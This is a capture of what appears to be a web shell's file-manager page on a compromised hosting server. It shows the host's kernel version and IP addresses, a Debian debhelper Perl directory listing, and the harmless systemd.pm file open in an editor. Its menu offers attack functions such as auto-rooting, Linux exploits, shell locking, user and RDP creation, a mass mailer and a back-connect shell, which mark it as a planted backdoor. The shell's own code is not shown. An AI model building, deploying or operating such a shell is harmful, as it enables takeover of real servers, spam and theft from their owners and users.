Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.130.122
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Debian /
Debhelper /
Sequence /
[ HOME SHELL ]
Name
Size
Permission
Action
autoreconf.pm
189
B
-rw-r--r--
autotools_dev.pm
332
B
-rw-r--r--
bash_completion.pm
131
B
-rw-r--r--
build_stamp.pm
280
B
-rw-r--r--
dwz.pm
268
B
-rw-r--r--
elf_tools.pm
281
B
-rw-r--r--
installinitramfs.pm
330
B
-rw-r--r--
perl_openssl.pm
391
B
-rw-r--r--
root_sequence.pm
2.66
KB
-rw-r--r--
single_binary.pm
1.64
KB
-rw-r--r--
systemd.pm
610
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd.pm
#!/usr/bin/perl use warnings; use strict; use Debian::Debhelper::Dh_Lib qw(compat error); if (not compat(10)) { error("The systemd-sequence is no longer provided in compat >= 11, please rely on dh_installsystemd instead"); } # dh_systemd_enable runs unconditionally, and before dh_installinit, so that # the latter can use invoke-rc.d and all symlinks are already in place. insert_before("dh_installinit", "dh_systemd_enable"); # dh_systemd_start handles the case where there is no corresponding init # script, so it runs after dh_installinit. insert_after("dh_installinit", "dh_systemd_start"); 1
Close